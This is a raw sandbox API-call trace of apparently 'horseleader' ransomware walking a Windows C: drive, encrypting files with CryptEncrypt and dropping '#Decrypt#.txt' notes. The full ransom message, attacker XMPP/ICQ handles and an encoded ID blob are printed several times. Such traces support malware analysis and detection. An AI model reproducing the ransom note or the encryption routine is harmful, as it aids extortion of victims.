(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0125.063] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0125.063] CloseHandle (hObject=0x1dc) returned 1 [0125.063] GetProcessHeap () returned 0x780000 [0125.064] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0125.064] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0125.064] FindClose (in: hFindFile=0x7c66e0 | out: hFindFile=0x7c66e0) returned 1 [0125.064] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\#Decrypt#.txt") returned 25 [0125.064] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\#Decrypt#.txt" (normalized: "c:\\boot\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0125.065] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0125.065] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af578*=0x5e4, lpOverlapped=0x0) returned 1 [0125.067] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0125.067] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af578*=0x558, lpOverlapped=0x0) returned 1 [0125.067] CloseHandle (hObject=0x158) returned 1 [0125.068] GetProcessHeap () returned 0x780000 [0125.068] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b67f0 | out: hHeap=0x780000) returned 1 [0125.068] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0125.068] lstrcmpiW (lpString1="bootmgr", lpString2="Windows") returned -1 [0125.068] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\bootmgr") returned 14 [0125.068] StrStrIW (lpFirst="bootmgr", lpSrch=".horseleader") returned 0x0 [0125.069] lstrcmpW (lpString1="bootmgr", lpString2="#Decrypt#.txt") returned 1 [0125.069] lstrcmpW (lpString1="bootmgr", lpString2="_uninstalling_.png") returned 1 [0125.069] lstrlenW (lpString=".testttjffg") returned 11 [0125.069] StrStrW (lpFirst="\\\\?\\C:\\bootmgr", lpSrch=".testttjffg") returned 0x0 [0125.069] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af6f0 | out: pbBuffer=0x32af6f0) returned 1 [0125.069] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af6f0*, pdwDataLen=0x32af7ac*=0x24, dwBufLen=0x80 | out: pbData=0x32af6f0*, pdwDataLen=0x32af7ac*=0x80) returned 1 [0125.070] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.070] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0125.070] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="Windows") returned -1 [0125.070] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\BOOTSECT.BAK") returned 19 [0125.071] StrStrIW (lpFirst="BOOTSECT.BAK", lpSrch=".horseleader") returned 0x0 [0125.071] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2="#Decrypt#.txt") returned 1 [0125.071] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2="_uninstalling_.png") returned 1 [0125.071] lstrlenW (lpString=".testttjffg") returned 11 [0125.071] StrStrW (lpFirst="\\\\?\\C:\\BOOTSECT.BAK", lpSrch=".testttjffg") returned 0x0 [0125.071] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af6f0 | out: pbBuffer=0x32af6f0) returned 1 [0125.071] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af6f0*, pdwDataLen=0x32af7ac*=0x24, dwBufLen=0x80 | out: pbData=0x32af6f0*, pdwDataLen=0x32af7ac*=0x80) returned 1 [0125.072] CreateFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.097] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0125.100] lstrcmpiW (lpString1="Config.Msi", lpString2="Windows") returned -1 [0125.103] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi") returned 17 [0125.103] lstrcmpW (lpString1="Config.Msi", lpString2=".") returned 1 [0125.104] lstrcmpW (lpString1="Config.Msi", lpString2="..") returned 1 [0125.104] lstrcmpW (lpString1="\\\\?\\C:\\Config.Msi", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0125.104] GetProcessHeap () returned 0x780000 [0125.105] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b67f0 [0125.107] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Config.Msi\\*") returned 19 [0125.302] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName=".", cAlternateFileName="")) returned 0x7c66e0 [0125.309] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0125.309] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\.") returned 19 [0125.309] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0125.309] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0125.309] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0125.309] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0125.309] lstrlenW (lpString=".testttjffg") returned 11 [0125.310] StrStrW (lpFirst="\\\\?\\C:\\Config.Msi\\.", lpSrch=".testttjffg") returned 0x0 [0125.310] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0125.310] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0125.310] CreateFileW (lpFileName="\\\\?\\C:\\Config.Msi\\." (normalized: "c:\\config.msi\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.310] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="..", cAlternateFileName="")) returned 1 [0125.310] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0125.312] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\..") returned 20 [0125.312] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0125.312] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0125.313] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0125.314] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0125.314] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0125.314] lstrlenW (lpString=".testttjffg") returned 11 [0125.316] StrStrW (lpFirst="\\\\?\\C:\\Config.Msi\\..", lpSrch=".testttjffg") returned 0x0 [0125.324] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0125.325] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0125.326] CreateFileW (lpFileName="\\\\?\\C:\\Config.Msi\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.327] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="..", cAlternateFileName="")) returned 0 [0125.329] FindClose (in: hFindFile=0x7c66e0 | out: hFindFile=0x7c66e0) returned 1 [0125.329] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\#Decrypt#.txt") returned 31 [0125.330] CreateFileW (lpFileName="\\\\?\\C:\\Config.Msi\\#Decrypt#.txt" (normalized: "c:\\config.msi\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0125.330] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0125.336] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af578*=0x5e4, lpOverlapped=0x0) returned 1 [0125.347] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0125.355] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af578*=0x558, lpOverlapped=0x0) returned 1 [0125.355] CloseHandle (hObject=0x200) returned 1 [0125.356] GetProcessHeap () returned 0x780000 [0125.356] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b67f0 | out: hHeap=0x780000) returned 1 [0125.356] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0125.357] lstrcmpiW (lpString1="Documents and Settings", lpString2="Windows") returned -1 [0125.357] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Documents and Settings") returned 29 [0125.359] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1 [0125.367] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1 [0125.368] lstrcmpW (lpString1="\\\\?\\C:\\Documents and Settings", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0125.369] GetProcessHeap () returned 0x780000 [0125.369] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b67f0 [0125.397] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Documents and Settings\\*") returned 31 [0125.397] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="..", cAlternateFileName="")) returned 0xffffffff [0125.407] GetProcessHeap () returned 0x780000 [0125.407] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b67f0 | out: hHeap=0x780000) returned 1 [0125.407] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0125.407] lstrcmpiW (lpString1="hiberfil.sys", lpString2="Windows") returned -1 [0125.407] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\hiberfil.sys") returned 19 [0125.407] StrStrIW (lpFirst="hiberfil.sys", lpSrch=".horseleader") returned 0x0 [0125.407] lstrcmpW (lpString1="hiberfil.sys", lpString2="#Decrypt#.txt") returned 1 [0125.408] lstrcmpW (lpString1="hiberfil.sys", lpString2="_uninstalling_.png") returned 1 [0125.408] lstrlenW (lpString=".testttjffg") returned 11 [0125.408] StrStrW (lpFirst="\\\\?\\C:\\hiberfil.sys", lpSrch=".testttjffg") returned 0x0 [0125.408] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af6f0 | out: pbBuffer=0x32af6f0) returned 1 [0125.408] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af6f0*, pdwDataLen=0x32af7ac*=0x24, dwBufLen=0x80 | out: pbData=0x32af6f0*, pdwDataLen=0x32af7ac*=0x80) returned 1 [0125.408] CreateFileW (lpFileName="\\\\?\\C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.411] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, 